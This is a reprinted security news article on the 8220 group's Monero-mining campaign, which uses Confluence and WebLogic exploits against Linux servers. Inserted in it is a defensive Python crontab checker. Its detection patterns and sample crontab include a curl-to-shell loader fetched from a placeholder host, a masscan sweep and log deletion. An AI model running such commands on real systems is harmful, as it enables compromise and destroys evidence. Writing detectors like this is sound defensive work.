Microsoft Warns of Cryptomining Malware Campaign Targeting Linux Servers

1 de julho de 2022

A cloud threat actor group tracked as 8220 has updated its malware toolset to breach Linux servers with the goal of installing crypto miners as part of a long-running campaign.

“The updates include the deployment of new versions of a crypto miner and an IRC bot,” Microsoft Security Intelligence said in a series of tweets on Thursday. “The group has actively updated its techniques and payloads over the last year.”

8220, active since early 2017, is a Chinese-speaking, Monero-mining threat actor so named for its preference to communicate with command-and-control (C2) servers over port 8220. It’s also the developer of a tool called whatMiner, which has been co-opted by the Rocke cybercrime group in their attacks.

In July 2019, the Alibaba Cloud Security Team uncovered an extra shift in the adversary’s tactics, noting its use of rootkits to hide the mining program. Two years later, the gang resurfaced with Tsunami IRC botnet variants and a custom “PwnRig” miner.

Now, according to Microsoft, the most recent campaign striking i686 and x86_64 Linux systems has been observed weaponizing remote code execution exploits for the freshly disclosed Atlassian Confluence Server (CVE-2022-26134) and Oracle WebLogic (CVE-2019-2725) flaws for initial access.

This step is succeeded by the retrieval of a malware loader from a remote server that’s designed to drop the PwnRig miner and an IRC bot, but not before taking steps to evade detection by erasing log files and disabling cloud monitoring and security software.

Besides achieving persistence by means of a cron job, the “loader uses the IP port scanner tool ‘masscan’ to find other SSH servers in the network, and then uses the GoLang-based SSH brute force tool ‘spirit’ to propagate,” Microsoft said.
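As an added example (not code from the article or from Microsoft's reporting), a small Python check that flags crontab entries carrying the persistence and propagation indicators described above: a loader fetched from a remote host and piped into a shell, traffic to port 8220, masscan or spirit invocations, and log wiping. The sample crontab and its TEST-NET address are constructed for illustration.

```python
import re

# Heuristics drawn from the campaign description: remote loader piped to a shell,
# C2 on port 8220, masscan/spirit for lateral movement, and log deletion.
# They are illustrative, not a complete or authoritative rule set.
INDICATORS = [
    (re.compile(r"\b(curl|wget)\b.*\|\s*(ba)?sh\b"), "remote script piped straight into a shell"),
    (re.compile(r":8220\b"), "connection to port 8220 (the group's preferred C2 port)"),
    (re.compile(r"\bmasscan\b"), "masscan port scanner (used to find SSH servers)"),
    (re.compile(r"\bspirit\b"), "'spirit' SSH brute-force tool"),
    (re.compile(r"\brm\s+(-\w+\s+)*/var/log"), "deletion of log files"),
]


def find_suspicious_cron(crontab_text):
    """Return [(line_no, entry, [reasons])] for crontab entries matching any indicator."""
    hits = []
    for line_no, raw in enumerate(crontab_text.splitlines(), start=1):
        entry = raw.strip()
        if not entry or entry.startswith("#"):
            continue  # skip blank lines and comments
        reasons = [why for pattern, why in INDICATORS if pattern.search(entry)]
        if reasons:
            hits.append((line_no, entry, reasons))
    return hits


# Constructed sample crontab; 198.51.100.7 is a TEST-NET address, not an indicator from the article.
SAMPLE_CRONTAB = """\
0 2 * * * /usr/bin/logrotate /etc/logrotate.conf
*/5 * * * * curl -fsSL http://198.51.100.7:8220/loader.sh | sh
@reboot /tmp/.x/masscan -p22 10.0.0.0/8 --rate 1000 -oL /tmp/.x/ssh.txt
30 4 * * * rm -rf /var/log/*
"""

if __name__ == "__main__":
    for line_no, entry, reasons in find_suspicious_cron(SAMPLE_CRONTAB):
        print(f"line {line_no}: {entry}\n    -> {'; '.join(reasons)}")
```

Run it against `crontab -l` output or the files under `/etc/cron.d` to get a first triage list; every hit still needs a human look, since legitimate jobs can match a single pattern.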

The findings come as Akamai revealed that the Atlassian Confluence flaw is witnessing a steady 20,000 exploitation attempts per day that are launched from about 6,000 IPs, down from a peak of 100,000 in the immediate aftermath of the bug disclosure on June 2, 2022. 67% of the attacks are said to have originated from the U.S.

“In the lead, commerce accounts for 38% of the attack activity, followed by high tech and financial services, respectively,” Akamai’s Chen Doytshman said this week. “These top three verticals make up more than 75% of the activity.”

The attacks range from probes that determine whether the target system is vulnerable to the injection of malware such as web shells and crypto miners, the cloud security company noted.

“What is particularly concerning is how much of a shift upward this attack type has garnered over the last several weeks,” Doytshman added. “As we have seen with similar vulnerabilities, this CVE-2022-26134 will likely continue to be exploited for at least the next couple of years.”

Source: The Hacker News